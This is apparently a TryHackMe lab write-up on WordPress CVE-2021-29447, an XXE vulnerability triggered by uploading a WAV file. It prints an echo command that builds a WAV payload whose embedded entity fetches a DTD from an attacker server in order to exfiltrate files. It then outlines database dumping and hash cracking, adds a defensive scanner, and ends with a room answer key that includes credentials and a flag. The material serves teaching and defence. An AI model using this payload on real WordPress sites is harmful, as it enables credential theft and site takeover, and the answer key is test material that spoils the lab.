We covered a WordPress XXE vulnerability, CVE-2021-29447, that allows sensitive file disclosure and server-side request forgery (SSRF). We exploited this WordPress vulnerability by generating a WAV payload and uploading it to the compromised WordPress website. This was part of the TryHackMe room WordPress: CVE-2021-29447.


What is an XXE vulnerability?

An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers and XML data. It often allows an attacker to interact with any backend or external system that the application itself can access, and can allow the attacker to read files on that system. It can also be used to cause a Denial of Service (DoS), or to perform Server-Side Request Forgery (SSRF) by inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.

WordPress CVE-2021-29447 Impact

  • Arbitrary File Disclosure: The contents of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
  • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

Identifying the Vulnerability

The attacker uses WPScan to enumerate the WordPress installation and its plugins, discovering WordPress version 5.6.2, which is vulnerable to CVE-2021-29447. The vulnerability specifically affects WordPress installations running on PHP 8.

Exploiting the Vulnerability

After gaining low-privileged access to the WordPress admin panel, the attacker prepares an XML-based payload for the exploitation. The payload is crafted as a WAV file (payload.wav) whose iXML chunk carries an XML external entity (XXE) declaration; when WordPress parses the file's metadata, the entity is resolved and used to retrieve sensitive data from the web server.

Creating The Payload

You can create the WAV payload using the commands shown below.

# create the WAV payload with echo; change the IP, port and DTD file name to match your listener
# the '"'"' sequences embed a literal single quote inside the single-quoted string
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

References

  • WordPress 5.7 – ‘Media Library’ XML External Entity Injection (XXE) (Authenticated): Exploit-DB
  • WordPress 5.6-5.7 – Authenticated (Author+) XXE (CVE-2021-29447): Github
  • WordPress 5.6-5.7 – Authenticated XXE Within the Media Library Affecting PHP 8: wpscan

Uploading the Payload

The attacker uploads the crafted payload.wav file to the WordPress media library. While extracting the file's metadata, WordPress parses the embedded XML and requests a second file (proof_of_concept.dtd) from the attacker's server. That DTD defines the entities that read a local file such as /etc/passwd and send its contents back to the attacker's server; this outbound request made by WordPress is the SSRF component of the attack.

A local web server is set up to host the second file (proof_of_concept.dtd), which the WordPress server fetches. The attacker watches that web server's access log to see when WordPress requests the DTD and to capture the data that comes back.
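To catch this class of upload on the defensive side, the following added example (not code from the room or the original write-up) walks the RIFF chunks of a WAV file and reports any chunk carrying a DOCTYPE or ENTITY declaration, which legitimate iXML metadata never needs; the two sample files and the ATTACKER_PLACEHOLDER URL are constructed for the demonstration.

```python
import struct

# Audio metadata never needs a DTD; an inline DOCTYPE/ENTITY is exactly what the
# CVE-2021-29447 WAV payload carries in the iXML chunk getID3 parses on upload.
MARKERS = (b"<!DOCTYPE", b"<!ENTITY")

def riff_chunks(data: bytes):
    """Yield (chunk_id, payload) per chunk after the 12-byte RIFF header.
    Sizes are untrusted: an oversized length is clamped to the bytes
    present, so a malformed header cannot raise or skip the payload."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        (size,) = struct.unpack("<I", data[pos + 4:pos + 8])
        start, end = pos + 8, min(pos + 8 + size, len(data))
        yield cid, data[start:end]
        pos = end + (size & 1)  # chunks are padded to an even length

def entity_markers(blob: bytes) -> list:
    """Return the DTD tokens present in blob, matched case-insensitively."""
    upper = blob.upper()
    return [m.decode() for m in MARKERS if m in upper]

def scan_wav(data: bytes) -> list:
    """Return [(chunk_id, [markers])]; empty means nothing suspicious.
    A raw byte scan follows the chunk walk so a file with a broken header
    or a chunk lying about its size is still caught (tagged 'raw')."""
    findings = []
    for cid, payload in riff_chunks(data):
        hits = entity_markers(payload)
        if hits:
            findings.append((cid.decode("ascii", "replace"), hits))
    if not findings and entity_markers(data):
        findings.append(("raw", entity_markers(data)))
    return findings

def build_wav(chunks) -> bytes:
    """Assemble a minimal RIFF/WAVE container from (id, payload) pairs."""
    body = b"".join(cid + struct.pack("<I", len(p)) + p + b"\x00" * (len(p) & 1)
                    for cid, p in chunks)
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body

# Constructed samples (not real uploads): benign iXML metadata, and a
# chunk shaped like the CVE-2021-29447 PoC with a placeholder URL.
BENIGN_WAV = build_wav([(b"fmt ", b"\x01\x00\x01\x00" + b"\x00" * 12),
                        (b"iXML", b"<?xml version='1.0'?><BWFXML><PROJECT>demo</PROJECT></BWFXML>")])
XXE_WAV = build_wav([(b"iXML", b"<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM "
                               b"'http://ATTACKER_PLACEHOLDER/evil.dtd'>%remote;]>")])
```

Running scan_wav over files as they land in wp-content/uploads, or in a pre-upload hook, turns the iXML DTD into an alertable indicator rather than a silent parse.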

Retrieving and Decoding Data

The data that arrives at the attacker's web server is Base64-encoded and zlib-compressed. The attacker uses a PHP script to decode the Base64 string and decompress the data, revealing sensitive information such as the contents of wp-config.php.

Accessing the Database

Using the database credentials retrieved from wp-config.php, the attacker logs into the MySQL database, lists the databases, selects the WordPress database, and dumps the contents of the wp_users table. The attacker's goal is to retrieve the admin password hash and crack it to gain full administrative control over the WordPress site.

Cracking the Admin Hash

The password hash is cracked using a tool like John the Ripper, enabling the attacker to log in as the WordPress admin.

CVE-2021-29447 TryHackMe | Room Answers

Based on the results of #1, what is the name of the database for WordPress?

wordpressdb2

Based on the results of #1, what are the credentials you found?

example: user:password

thedarktangent:sUp3rS3cret132

Enumerate and identify what dbms is installed on the server.

MySQL

Based on the results of #4, what is the dbms version installed on the server?

5.7.33

Based on the results of #4, what port is the dbms running on?

3306

Compromise the dbms. What is the encrypted password located in the wordpress users table with id 1?

$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1

Based on the results of #7, what is the password in plain text?

teddybear

Compromise the machine and locate flag.txt

thm{28bd2a5b7e0586a6e94ea3e0adbd5f2f16085c72}

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.